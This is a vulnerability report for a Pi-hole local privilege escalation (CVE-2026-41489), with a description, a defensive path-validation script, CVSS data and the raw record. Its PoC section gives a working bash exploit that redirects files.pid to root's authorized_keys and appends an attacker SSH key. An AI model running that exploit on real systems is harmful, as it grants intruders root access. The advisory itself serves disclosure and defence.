Security Vulnerability Report
CVE-2026-41489 CVSS 8.8 HIGH

Published: 2026-05-11 21:19:00
Last Modified: 2026-05-11 21:19:00

Description

Pi-hole is a DNS sinkhole that protects devices from unwanted content without installing any client-side software. From 6.0 to before Core 6.4.2 and FTL 6.6.1, two shell scripts executed as root by systemd (pihole-FTL-prestart.sh as ExecStartPre and pihole-FTL-poststop.sh as ExecStopPost) read the files.pid path from pihole-FTL's configuration (pihole.toml) without validation and use it in privileged file operations (install and rm -f). By writing an arbitrary path into files.pid, an attacker with pihole privilege can make root delete and then recreate any file on the system outside the directories that the unit's ProtectSystem=full setting protects, and the recreated file is writable by the attacker. On a default Pi-hole installation this yields local privilege escalation to root via SSH authorized_keys manipulation. If /root/.ssh/authorized_keys does not exist (the default on fresh installs), only the ExecStartPre hook is needed. If the file exists, the ExecStopPost hook deletes it first; a single service restart runs both hooks in sequence. This vulnerability is fixed in Core 6.4.2 and FTL 6.6.1.
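The missing step is a whitelist check on the files.pid value before a root-run hook hands it to install(1) or rm -f. The following is an added example, not Pi-hole's own code and not the upstream fix (the page does not show how Core 6.4.2 / FTL 6.6.1 resolve it). The function names, the PIHOLE_RUN_DIR variable and its /run/pihole default are assumptions; the caller is assumed to have already read the files.pid value from FTL's configuration.

```bash
#!/usr/bin/env bash
# Added example, not Pi-hole's own code: the validation the root-run hooks
# (pihole-FTL-prestart.sh / pihole-FTL-poststop.sh) lacked, applied to the
# files.pid value before install/rm -f touches it. Assumptions: the caller
# has already read files.pid from FTL's configuration, and a legitimate PID
# file lives directly under PIHOLE_RUN_DIR (/run/pihole here, a hypothetical
# location chosen for this example).

: "${PIHOLE_RUN_DIR:=/run/pihole}"

# Syntactic check, no filesystem access: absolute path, no empty, "." or
# ".." components, and the parent directory must be exactly PIHOLE_RUN_DIR.
# Returns 0 when the value is acceptable, 1 otherwise.
pidfile_path_ok() {
    local p="$1" rest comp
    [ "${p#/}" != "$p" ] || return 1          # must start with "/"
    rest="${p#/}"
    while :; do
        comp="${rest%%/*}"
        case "$comp" in ''|.|..) return 1 ;; esac
        [ "$comp" != "$rest" ] || break         # last component reached
        rest="${rest#*/}"
    done
    [ "${p%/*}" = "$PIHOLE_RUN_DIR" ] || return 1
}

# Runtime check for the root hook: the parent must be a real directory and
# neither it nor the target may be a symlink, so a pihole-owned link cannot
# redirect the privileged operation somewhere else.
pidfile_safe_to_use() {
    local p="$1" dir
    pidfile_path_ok "$p" || return 1
    dir="${p%/*}"
    [ -d "$dir" ] && [ ! -L "$dir" ] || return 1
    [ ! -L "$p" ]
}

# Hardened equivalent of the ExecStartPre step: create the empty PID file
# only after validation. The hooks on the page use install(1); this is its
# portable equivalent, and the chown is skipped when not running as root so
# the function can be exercised unprivileged.
prestart_create_pidfile() {
    local p="$1" owner="${2:-pihole}" group="${3:-${2:-pihole}}"
    pidfile_safe_to_use "$p" || { echo "refusing files.pid=$p" >&2; return 1; }
    : > "$p" && chmod 0644 "$p" || return 1
    if [ "$(id -u)" -eq 0 ]; then chown "$owner:$group" "$p"; fi
}

# Hardened equivalent of the ExecStopPost step.
poststop_remove_pidfile() {
    local p="$1"
    pidfile_safe_to_use "$p" || { echo "refusing files.pid=$p" >&2; return 1; }
    rm -f -- "$p"
}

# Usage: ./pidcheck.sh /root/.ssh/authorized_keys   (prints "rejected: ...")
if [ "$#" -gt 0 ]; then
    if pidfile_path_ok "$1"; then echo "ok: $1"; else echo "rejected: $1"; fi
fi
```

Two caveats a reviewer would raise. First, a check-then-use window remains between the symlink test and the create or delete; rejecting symlinks and keeping PIHOLE_RUN_DIR root-owned narrows it, but the robust fix is to stop letting a pihole-writable setting decide where root writes at all (hardcode the path in the hooks, or ignore the setting there). Second, the syntactic check deliberately rejects subdirectories and trailing slashes; if a deployment needs a different layout, widen the parent test rather than drop it.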

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

Pi-hole Core 6.0 to 6.4.1 (fixed in 6.4.2)
Pi-hole FTL 6.0 to 6.6.0 (fixed in 6.6.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC for CVE-2026-41489: Pi-hole local privilege escalation
# The root-run systemd hooks (pihole-FTL-prestart.sh, pihole-FTL-poststop.sh)
# use the files.pid setting unvalidated in `install` and `rm -f`.
# Attacker requirements: code execution as the 'pihole' user (or any other way
# to change the files.pid setting) plus a way to restart pihole-FTL.
set -u

# 1. Target file: root's SSH authorized_keys
TARGET_FILE="/root/.ssh/authorized_keys"

# 2. Attacker public key to inject (placeholder, substitute your own)
ATTACKER_PUB_KEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC... attacker@evil"

echo "[+] Exploiting CVE-2026-41489..."

echo "[*] Step 1: Pointing files.pid at $TARGET_FILE"
# files.pid is a key inside pihole-FTL's configuration (/etc/pihole/pihole.toml),
# not a file of its own. The pihole user can change it with FTL's --config
# option; editing pihole.toml directly works as well.
pihole-FTL --config files.pid "$TARGET_FILE"

echo "[*] Step 2: Restarting pihole-FTL so the root hooks run"
# A restart runs, in order:
#   ExecStopPost (pihole-FTL-poststop.sh) -> rm -f "$TARGET_FILE"   (only if it exists)
#   ExecStartPre (pihole-FTL-prestart.sh) -> install ... "$TARGET_FILE"
# On default installs the pihole user may run /usr/local/bin/pihole via a
# passwordless sudoers entry, so `pihole restartdns` restarts FTL without a
# root shell; with root already in hand, `systemctl restart pihole-FTL` does the same.
sudo pihole restartdns

echo "[*] Step 3: Checking whether the recreated file is writable"
# The prestart hook recreates the file with `install`; on affected versions the
# result is writable by the pihole user, so the key can simply be appended.
if [ -w "$TARGET_FILE" ]; then
    echo "$ATTACKER_PUB_KEY" >> "$TARGET_FILE"
    echo "[+] Success: key appended. You can now SSH in as root."
else
    # If the hook creates it as root:root 0600 instead, this trigger alone is not
    # enough; inspect the hook scripts for the exact install arguments.
    echo "[!] $TARGET_FILE was recreated but is not writable by $(id -un)."
fi

References

https://github.com/pi-hole/pi-hole/security/advisories/GHSA-6w8x-p785-6pm4 (GitHub security advisory; the only reference in the CVE record)
Weakness classification from the CVE record: CWE-15 (External Control of System or Configuration Setting), CWE-269 (Improper Privilege Management), CWE-732 (Incorrect Permission Assignment for Critical Resource)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41489", "sourceIdentifier": "[email protected]", "published": "2026-05-11T21:19:00.267", "lastModified": "2026-05-11T21:19:00.267", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pi-hole is a DNS sinkhole that protects devices from unwanted content without installing any client-side software. From 6.0 to before Core 6.4.2 and FTL 6.6.1, two shell scripts executed as root by systemd (pihole-FTL-prestart.sh and pihole-FTL-poststop.sh) read the files.pid path from this config without validation and use it in privileged file operations (install and rm -f). By writing an arbitrary path into files.pid, an attacker with pihole privilege can cause root to delete and then recreate any file on the system outside the ProtectSystem=full-restricted directories, gaining write access to it. On a default Pi-hole installation this yields local privilege escalation to root via SSH authorized keys manipulation. If /root/.ssh/authorized_keys does not exist (default on fresh installs), only ExecStartPre is required. If the file exists, ExecStopPost deletes it first, and the same restart triggers both hooks in sequence. This vulnerability is fixed in Core 6.4.2 and FTL 6.6.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-15"}, {"lang": "en", "value": "CWE-269"}, {"lang": "en", "value": "CWE-732"}]}], "references": [{"url": "https://github.com/pi-hole/pi-hole/security/advisories/GHSA-6w8x-p785-6pm4", "source": "[email protected]"}]}}